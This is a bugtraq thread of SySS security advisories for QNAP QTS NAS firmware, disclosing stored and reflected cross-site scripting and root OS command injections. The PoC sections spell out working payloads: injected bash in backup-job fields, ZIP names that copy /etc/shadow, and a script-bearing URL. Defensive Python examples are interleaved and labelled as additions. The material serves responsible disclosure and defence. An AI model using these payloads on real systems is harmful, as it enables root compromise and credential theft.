[SYSS-2016-049] QNAP QTS - Persistent Cross-Site Scripting

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-049
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
such as JavaScript on the system; the code is then executed in the
browser of every visitor who views the affected page. It can be used,
for example, to execute commands in the scope of that user, to infect
the user's browser, and so on.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs sufficient permissions to either
create or rename directories.
2. When creating a folder, the QTS web interface runs some checks on the
new folder name. Those checks are only performed in JavaScript in the
browser. If folder creation or renaming is performed with a direct
request to the QNAP, no string validation is done:

$ curl --data \
  'dest_path=%2F[validDirectory]_folder==[validsid]' \
  http://[ip]:8080/cgi-bin/filemanager/utilRequest.cgi?func=createdir

3. Open the newly created directory in the 'File Station' component. The
name of the directory is displayed without prior sanitization or
encoding, thus executing the provided script.
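The point of step 2 is that a check which only runs in the browser is not a check at all once the request is sent directly. The following is an added example (not QNAP code, not part of the advisory) of what the server side of such an endpoint should do: enforce a directory-name policy on the request itself and reject anything outside it, so the bypass by direct request no longer exists. The handler name, the `dest_folder` parameter and the name policy are assumptions made for illustration.

```python
"""Server-side validation of a directory name at the createdir endpoint.

Added example, not QNAP code. The handler, the `dest_folder` parameter and
the accepted-name policy are assumptions."""
import re
from typing import Dict, Tuple

# Assumed policy: a single path component made of letters, digits, spaces,
# dots, underscores and hyphens; no separators, no control or markup chars.
_NAME_RE = re.compile(r"[A-Za-z0-9 ._-]{1,255}")


def validate_dir_name(name: str) -> bool:
    """Return True only if `name` is an acceptable single directory name."""
    if name in (".", ".."):
        return False
    if name != name.strip():          # no leading/trailing whitespace
        return False
    return _NAME_RE.fullmatch(name) is not None


def handle_createdir(form: Dict[str, str]) -> Tuple[int, str]:
    """Simulated createdir handler.

    The same rule the browser applies is applied here again, on the raw
    request, because the browser-side check can simply be skipped."""
    name = form.get("dest_folder", "")
    if not validate_dir_name(name):
        return 400, "invalid directory name"
    # A real handler would create the directory here and log the request.
    return 200, f"created {name}"


if __name__ == "__main__":
    for candidate in ("reports 2016", "a<b", "..", "x/y", " padded"):
        print(repr(candidate), handle_createdir({"dest_folder": candidate}))
```

Validation alone does not replace output encoding in the listing that later displays the name; it closes the specific gap described in step 2, where the only filter lived in the browser.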



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only
trusted users/administrators have the necessary permissions to create
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-049

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-049.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVkAAoJENEtJqSRgP2yU2IH/jfUaEPw5Dql7OvXyceQeYrZ
+XHLGfeOecVbxQi2SjKxRMYRxS1mYDF975Lqfc9/PaKUsgZMk1NRWEYDFyB29AQO
HQQ0s9boANfPaJUSxmF9+DE/CIkh1PI/Zw6s8ox+WtvvLnutWbfll6ERD9xB0MCu
wn9QqseR8Jveg4lF/dHRqzdmBZnCSFJp/INLLs4i5DQsvjSCo/hnWTclyU+gh1jD
xIsUb9xoxE4XgeFfOz8O5SPeULkNupCbn6NHRyjWs1fZXBR0et9ThwQw8fHhjIq8
S3dcX2MEcs/7j2G4tqOLq6e/HIoZ3Nt/1uL8dZ64bLoKS4dXKPwtBmDDV+629R4=
=oJRw
-----END PGP SIGNATURE-----


[SYSS-2016-054] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-054
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-07
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices[1].



Vulnerability Details:


The SySS GmbH found an OS command injection in the appRequest plugin of
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs no special privileges.
2. Run a request like the following:

==
POST /cgi-bin/application/appRequest.cgi?=getRemoteRSS HTTP/1.1
Host: 192.168.42.201:8080
Content-Length: 39

lang=geryyy><=qpkg=[validSid]

==
3. The lang parameter is placed inside a wget command without encoding
or sanitizing the string. It is truncated to 8 characters, which makes
exploitation difficult; still, overwriting critical data, for example,
would be easy.

The above request produces an error message in the response headers,
similar to the following:

HTTP/1.1 200 OK
Date: Tue, 07 Jun 2016 05:57:57 GMT
sh: -c: line 0: syntax error near unexpected token `<'
sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q 
http://download.qnap.com/Liveupdate/QTS4.2.1/qpkgcenter_geryyy><hPÞÿ<}h£a 
   .xml -O /home/httpd/RSS/rssdoc/qpkgcenter_geryyy><hPÞÿ<}h£a  
.xml.tmp 1>>/dev/null 2>>/dev/null'
Content-type: text/xml
Content-Length: 4587
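The response above is itself a detection opportunity: a shell diagnostic ("sh: -c: line 0: ...") has no business appearing in an HTTP response, and its presence means a request value reached a shell. The following is an added example (not from the advisory, not QNAP code) of a check a defender can run over captured responses, for instance from a reverse proxy or a scanner's output. The sample response is constructed after the one shown above, with the command line replaced by a placeholder.

```python
"""Flag shell diagnostics that leak into HTTP responses.

Added example, not QNAP code. SAMPLE_RESPONSE is constructed for this
example; the URL in it is a placeholder."""
import re
from typing import Iterable, List, NamedTuple


class Leak(NamedTuple):
    line_no: int
    shell: str
    message: str


# Shape of a POSIX shell error written to stderr, e.g.
# "sh: -c: line 0: syntax error near unexpected token `<'".
_SHELL_DIAG = re.compile(
    r"^(?P<shell>sh|bash|dash|ash|zsh): (?:-c: )?line \d+: (?P<msg>.*)$")


def find_shell_error_leaks(lines: Iterable[str]) -> List[Leak]:
    """Return every line that looks like a shell diagnostic, with its position."""
    hits: List[Leak] = []
    for n, line in enumerate(lines, 1):
        m = _SHELL_DIAG.match(line.rstrip("\r\n"))
        if m:
            hits.append(Leak(n, m.group("shell"), m.group("msg")))
    return hits


def response_leaks_shell_errors(raw_response: str) -> bool:
    """True if a whole captured response contains at least one such line."""
    return bool(find_shell_error_leaks(raw_response.splitlines()))


# Constructed sample in the shape of the advisory's response.
SAMPLE_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Date: Tue, 07 Jun 2016 05:57:57 GMT",
    "sh: -c: line 0: syntax error near unexpected token `<'",
    "sh: -c: line 0: `/usr/bin/wget -t 1 -T 30 -q http://[placeholder]/x.xml'",
    "Content-type: text/xml",
    "Content-Length: 0",
    "",
    "",
])

# Constructed sample of a response with nothing to report.
CLEAN_RESPONSE = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Content-type: text/xml",
    "Content-Length: 0",
    "",
    "",
])


if __name__ == "__main__":
    for leak in find_shell_error_leaks(SAMPLE_RESPONSE.splitlines()):
        print(f"line {leak.line_no}: {leak.shell}: {leak.message}")
```

The pattern is deliberately narrow (shell name, optional `-c:`, line number) so that ordinary response bodies containing the word "line" do not trip it; widen it only with more sample data from the systems being watched.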




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-07: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-054

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-054.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVoAAoJENEtJqSRgP2ydA0H/jHyaW0S//do0y13oEWH1n8O
QAwTKnWY5SiPOZ6CdEFh+W7VsuZsh5QupIHFm/mYRPZ3gfBmFc/Pk9f/qQFCoHmc
6whFVm/E8WbwasHUo4uLEiFwFOsCSG2j+45+DqF5YIWXQZm/Fk7q+AlSEqQo169+
kvXoZpGD81JAq0TwzpbKFExwip+zxlSdkjffwXoJcNijD1DXIRjx1j5qML9P5W/h
UJVCkAiAoICJf8Cei6jrIDN/LjvHHWtw2R7AFw0Eic3CQjkdWFqAHOEV6s7CNQjD
Rrr3za7BPN6CUe098BDbnXhmIFu4T2ZbJ+88jPMXHUv5NcvZ7SwSIE++uYQ0FmI=
=LzeJ
-----END PGP SIGNATURE-----



[SYSS-2016-050] QNAP QTS - Persistent Cross-Site Scripting

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-050
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found a persistent/stored cross-site scripting
vulnerability in the file viewer component of the QTS administrative
interface.

This type of vulnerability allows an attacker to store active content
like JavaScript on the system, executing the code in the browser of
visitors viewing the affected page. The code can then be used to e.g.
execute commands in the scope of the user, infect the users browser and
so on.



Proof of Concept (PoC):


1. Log in to the QNAP. The user needs sufficient permissions to create
ZIP files.
2. Right-click on a file or directory and select "compress(ZIP)".
3. In the newly opened window, enter a name containing HTML code like
blabla
and press OK.
4. The code is executed directly after the ZIP file is created.
5. Right-click on the ZIP file and hover over "Extract".
Again, the code is executed.



Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only
trusted users/administrators have the necessary permissions to create
or rename directories.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Vulnerability report updated to fix error in "hover over" 
description.
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-050

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-050.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVlAAoJENEtJqSRgP2yicQH/RVeQNcb3qhDUiLlfRMKmV//
Fxt52iVXKai0QiWN6GqBOIU0qon4xXvWyiwJckox5QMXJWELi4PPNoyPxfipCp0M
Q8jIbm1KbxMt2SAwUUG1fFY1Dvj8/dWt81S/HLWj131M7QParwFhLjiBoFNnerLM
49QSWe4jYonIUbqINqIIEJ1lp3hbHDTBOOlXHQahpxsUvphBsJBKfEJImERJ9vGT
VhJam8WJwwKjxsLRDxUiUiL2waLAhdbi2HeJiZy1CplwRvDst2yA5zdDG5iz5O3G
zcByMMyk5ZfRATGPYTH6tuEx2SWtFVFIIXPL8FtWi/7vKn2pITcj9vADFvANxSM=
=xxMF
-----END PGP SIGNATURE-----


[SYSS-2016-055] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-055
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: Unfixed
Manufacturer Notification: 2016-06-08
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:

The SySS GmbH found an OS command injection in the appRequest plugin of 
the current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC):

1. Log in to the QNAP. The user needs the privileges to create backup
   jobs.

2. Run a request like the following, testing connection to another QNAP
   for backups:

==
POST /cgi-bin/wizReq.cgi? HTTP/1.1 
Host: [IP of the QNAP]:8080
Content-Length: 282 
 
wiz_func=backup=test_server=1465380979663_CLIENT_MODE=QNAP_mode_LOCATION=$(bash%20-c%20"(echo;pwd)1>%262";exit)_CLIENT_PORT=873_VOL=undefined_PATH=%2F_USERNAME=$(bash%20-c%20"(echo;id)1>%262";exit)_PASSWD=asd_vol_info=yes=[sid]

3. The contained commands in SMB_LOCATION and SMB_USERNAME will be
   executed, as demonstrated in the following server response containing
   the output of the id and pwd commands:

==
HTTP/1.1 200 OK 
Date: Wed, 08 Jun 2016 10:31:50 GMT 
Content-Type: text/plain 
Content-Length: 1205 
 
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

/home/httpd/cgi-bin
Content-type: text/xml 
 


[...]



Solution:

The manufacturer has not released any security update or patch so far.
Validate input strings, escape shell arguments, or use parametrized
command execution.



Disclosure Timeline:

2016-06-08: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-055

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-055.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Sebastian Nerz of the SySS
GmbH.

E-Mail: sebastian.n...@syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWVpAAoJENEtJqSRgP2ywaYH/iCazUSz3EwUPxCTYQ2Qp8ce
egdvqcBUGXnqsUaUWy181K8R1Ive0h2F8IzTCft5gPX8y9FT+Pa35e1po/fBIFJg
EmV0w8D79+BAvUK23POFFyRXubrvtBQ9hOgq45qPYvGUkHEMGdzDRB9fuACwoJwS
xVxxWjtz7EgPPhhGzuh9RKu4slgJzsFustUNci/6FDPDc1+samcPxp3a/xo9ol2h
WEuaN80USZEdQgmTpf/2ePpVWmv72mtNrtWXLNbuUEtnYxALmO15S9BGQ7RpN+cB
hzM9CB87c7AIqd6owslaGcP4ZmjyKRSp1zgZnVycZPxsuVWrKmGetnewf1eOE0g=
=0eHe
-----END PGP SIGNATURE-----


[SYSS-2016-048] QNAP QTS - OS Command Injection

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-048
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.0 Build 20160311 and Build 20160601
Tested Version(s): 4.2.0 Build 20160311 - 4.2.2 Build 20160812
Vulnerability Type: OS Command Injection (CWE-78)
Risk Level: High
Solution Status: unfixed
Manufacturer Notification: 2016-06-03
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices (see [1]).



Vulnerability Details:


The SySS GmbH found an OS command injection in the File Station of the
current QTS administrative interface.

This type of vulnerability allows an attacker to run arbitrary commands
on the operating system of the host as root.



Proof of Concept (PoC, Build 20160311):

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

a;echo -e "cp \x2fetc\x2fshadow \x2fshare\x2fCACHEDEV1_DATA\x2f[current
dir]" | bash ; echo .zip

3. Right-click on the ZIP file and select Extract > Extract to 
[pre-selected directory with the name of the ZIP file]
(Extract > last entry)

4. The contained code will be executed; in this case, /etc/shadow is
copied to the current directory. Other code can of course be run as
well, e.g. to display some strings on the front display of the QNAP
(tested with a 470 Pro), name the ZIP file like this and extract it:

a;lcd_tool -1 PoC -2 OS-Command-Injection; echo .zip

Depending on the system this might not work out of the box.




Proof of Concept (PoC, Build 20160601):

1. Log in to the QNAP. The user needs sufficient permissions to either
rename or create ZIP files.
2. Upload or create a ZIP file with the following name:

test$(nslookup examplehost).zip

3. Right-click on the ZIP file and select Extract > Extract files

4. The contained code will be executed as can be confirmed by listening 
on the corresponding network.

The original exploit (Extract > last entry) will not work on the current
release of QTS. This exploit should work on previous versions of QTS as
well.
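All three command injection advisories on this page (SYSS-2016-054, the lang parameter in a wget command; SYSS-2016-055, backup-job fields; SYSS-2016-048, a ZIP file name in the extract command) share one root cause: a request value is pasted into a command string that a shell then parses. The remedy named in SYSS-2016-055 is validation, escaping, or parametrized execution. The following added example (not QNAP code, not part of any of the advisories) shows the unsafe string-building pattern next to its replacement: an allowlist check on the value, then an argv list so that no shell ever sees it, plus `shlex.quote` for the case where a shell cannot be avoided. The host name, paths, the accepted shape of `lang` and the ZIP-name policy are assumptions.

```python
"""Untrusted request values in OS commands: the unsafe pattern next to a safe one.

Added example, not QNAP code. The host name, the file paths, the accepted
shape of `lang` and the ZIP-name policy are assumptions."""
import re
import shlex
import subprocess
import sys
from typing import List

# Assumed allowlist for a language tag such as "en", "de" or "zh-TW".
_LANG_RE = re.compile(r"[a-z]{2,3}(?:-[A-Za-z]{2,4})?")
# Assumed ZIP-name policy: one path component of plain characters, ".zip".
_ZIP_RE = re.compile(r"[A-Za-z0-9 ._-]{1,251}\.zip")


def validate_lang(lang: str) -> bool:
    return _LANG_RE.fullmatch(lang) is not None


def validate_zip_name(name: str) -> bool:
    # A leading "-" is rejected so the name can never be read as an option.
    if name in (".", "..") or name.startswith("-"):
        return False
    return _ZIP_RE.fullmatch(name) is not None


def wget_command_unsafe(lang: str) -> str:
    """The pattern the advisories describe: the request value becomes part of
    one string that is later handed to `sh -c`. Shown for contrast only; this
    example never executes it."""
    return ("/usr/bin/wget -t 1 -T 30 -q "
            "http://updates.example.invalid/qpkgcenter_%s.xml "
            "-O /tmp/qpkgcenter_%s.xml.tmp" % (lang, lang))


def wget_argv(lang: str) -> List[str]:
    """Validated value, then an argv list: every element is one argument and
    no shell parses it. Run with subprocess.run(argv) (shell=False)."""
    if not validate_lang(lang):
        raise ValueError("lang rejected by allowlist")
    return ["/usr/bin/wget", "-t", "1", "-T", "30", "-q",
            f"http://updates.example.invalid/qpkgcenter_{lang}.xml",
            "-O", f"/tmp/qpkgcenter_{lang}.xml.tmp"]


def extract_argv(zip_name: str, dest_dir: str) -> List[str]:
    """Same treatment for the ZIP-name case of SYSS-2016-048."""
    if not validate_zip_name(zip_name):
        raise ValueError("zip name rejected by allowlist")
    return ["/usr/bin/unzip", "-o", zip_name, "-d", dest_dir]


def argv_roundtrip(value: str) -> str:
    """Show that an argv element reaches the child literally: run a child
    (the current interpreter, so this works offline) and return what it saw."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True)
    return proc.stdout


def quote_for_shell(value: str) -> str:
    """Last resort when a shell is unavoidable: quote each value. Validate
    first anyway; quoting protects the shell, not the program it starts."""
    return shlex.quote(value)


if __name__ == "__main__":
    print(wget_argv("de"))
    print(argv_roundtrip("test$(nslookup examplehost).zip"))
    print(quote_for_shell("a;b"))
```

The contrast to keep in mind: `wget_command_unsafe` produces one string whose meaning depends on every character of the input, whereas `wget_argv` has refused the input or placed it in exactly one argument slot before any process starts.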




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should ensure that only 
trusted users/administrators have access to the device.



Disclosure Timeline:

2016-06-03: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-06-22: Report updated to address (minor) changes in build 20160601
2016-07-06: Updated report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-048

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-048.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/




Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.nerz-at-syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQEcBAEBCgAGBQJXtWViAAoJENEtJqSRgP2yhjUIALi90iAlcbMaJuDlxw5myP22
ULuhqRRCsqS6kR5gVrUA7eJSRHYDubXF1PlW9SoYt3bdTfRyhb1Pwf71yGggmZ+M
eCS6ImGIwKvEoJNkXsWLSV9p2hd/ha/GgTPwEa0wwUJYvuBJfadthH71WlKi7e5u
68RYX3L/IO2wylkTa6L0MJU4le48EpZOZxgcuJIXTo5qt/nDDApKS3h1W3EqNAo7

[SYSS-2016-051] QNAP QTS - Reflected Cross-Site Scripting

2016-08-18 Thread bugtraq
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-051
Product: QNAP QTS
Manufacturer: QNAP
Affected Version(s): 4.2.1 Build 20160601
Tested Version(s): 4.2.1 Build 20160601 - 4.2.2 Build 20160812
Vulnerability Type: Reflected Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: unfixed
Manufacturer Notification: 2016-06-06
Solution Date: tbd.
Public Disclosure: 2016-08-18
CVE Reference: Not assigned
Author of Advisory: Sebastian Nerz (SySS GmbH)



Overview:

QTS is the operating system used by manufacturer QNAP on its series of
NAS devices.



Vulnerability Details:

The SySS GmbH found a reflected cross-site scripting vulnerability in
the /cgi-bin/application/appRequest.cgi component of the QTS administrative
interface.

This type of vulnerability allows an attacker to create a URL which, when
opened in the victim's browser, causes active content such as injected
JavaScript code to be displayed in the victim's browser, leading to the
execution of this code. The code can then be used to e.g. execute commands
in the scope of the user, infect the user's browser, and so on.



Proof of Concept (PoC):

1. Open the following URL in a browser without sufficient rXSS protection
(e.g. Firefox):
http://[QNAPIP]:8080/cgi-bin/application/appRequest.cgi?action=getQPKGDownloads=Testlink%3Cimg%20src=foo%20onError=alert%281%29%3E
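The fix for a reflected parameter, and equally for the stored directory and ZIP names of SYSS-2016-049 and SYSS-2016-050, is to encode the value for the context it is written into at the moment it is written. The following added example (not QNAP code, not part of the advisory) renders a hypothetical download page that reflects a `name` parameter into three contexts (HTML text, a URL inside an attribute, and a JavaScript string literal) and shows that the `<img ... onError=...>` string from the PoC above comes out as inert text in each. The template, the parameter name and the function names are assumptions.

```python
"""Context-aware output encoding for a reflected request parameter.

Added example, not QNAP code. The page template, the `name` parameter and
the render/encode functions are assumptions."""
import html
import json
from typing import Dict
from urllib.parse import quote


def for_html_text(value: str) -> str:
    """HTML body text or a double-quoted attribute value."""
    return html.escape(value, quote=True)


def for_url_param(value: str) -> str:
    """A query-string value; everything but unreserved characters is encoded."""
    return quote(value, safe="")


def for_js_string(value: str) -> str:
    """A JavaScript string literal inside a <script> block.

    json.dumps quotes and escapes the string; the extra replacements keep
    `</script>` and comment openers from being seen by the HTML tokenizer,
    which runs before the JavaScript parser."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_download_page(params: Dict[str, str]) -> str:
    """Reflect `name` into three contexts, each with its own encoder."""
    raw = params.get("name", "")
    return (
        "<!doctype html><html><body>"
        f"<h1>Download: {for_html_text(raw)}</h1>"
        f'<a href="/download?name={for_html_text(for_url_param(raw))}">link</a>'
        f"<script>var downloadName = {for_js_string(raw)};</script>"
        "</body></html>"
    )


if __name__ == "__main__":
    print(render_download_page({"name": "Testlink<img src=foo onError=alert(1)>"}))
```

A single encoder does not cover all three places: HTML escaping inside a `<script>` block would leave `</script>` intact, and JSON escaping inside an attribute would leave `"` intact, so the encoder has to match the context at each insertion point.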




Solution:

The manufacturer has not released any security update or patch so far.
Administrators of QNAP QTS 4.2 installations should restrict access to a
QNAP device to trusted users. Users should be informed about the
vulnerability and trained in security awareness.



Disclosure Timeline:

2016-06-06: Vulnerability discovered and reported to manufacturer
2016-06-20: Vulnerability report confirmed by manufacturer
2016-07-06: Manufacturer asked for timeline regarding a fix
2016-07-18: Manufacturer reminded about upcoming public disclosure
2016-08-18: Public disclosure



References:

[1] Product website for QNAP QTS
http://www.qnap.com/qts/4.2/en/
[2] SySS Security Advisory SYSS-2016-051

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-051.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

Security vulnerability found by Sebastian Nerz of the SySS GmbH.

E-Mail: sebastian.n...@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Sebastian_Nerz.asc
Key ID: 0x9180FDB2
Key Fingerprint: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
